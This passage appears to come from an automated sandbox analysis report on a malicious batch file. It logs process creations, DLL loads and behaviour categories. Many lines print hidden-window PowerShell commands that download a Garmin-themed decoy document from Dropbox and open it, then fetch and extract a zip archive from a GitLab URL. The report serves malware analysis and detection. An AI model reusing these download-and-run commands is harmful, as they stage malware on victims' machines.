                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\jhsdgfjkh236.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\jhsdgfjkh236.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgh8090051/jgh/-/raw/main/FGa1812.zip', 'C:\Users\Public\Document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\jhsdgfjkh236.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\jhsdgfjkh236.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\jhsdgfjkh236.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\jhsdgfjkh236.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgh8090051/jgh/-/raw/main/FGa1812.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: n.pdbcY source: powershell.exe, 0000000C.00000002.1369267843.000001973A988000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnet0ui@ source: powershell.exe, 0000000C.00000002.1369267843.000001973A988000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1367991489.000001973A613000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: *.pdbp source: powershell.exe, 0000000C.00000002.1367991489.000001973A613000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1367991489.000001973A5F7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn source: powershell.exe, 0000000C.00000002.1367991489.000001973A613000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbRb source: powershell.exe, 0000000C.00000002.1369267843.000001973A988000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: jhsdgfjkh236.bat, type: SAMPLE
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgh8090051/jgh/-/raw/main/FGa1812.zip', 'C:\Users\Public\Document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgh8090051/jgh/-/raw/main/FGa1812.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF7C1067047 push esp; retf 12_2_00007FF7C1067048

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgh8090051/jgh/-/raw/main/FGa1812.zip', 'C:\Users\Public\Document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgh8090051/jgh/-/raw/main/FGa1812.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
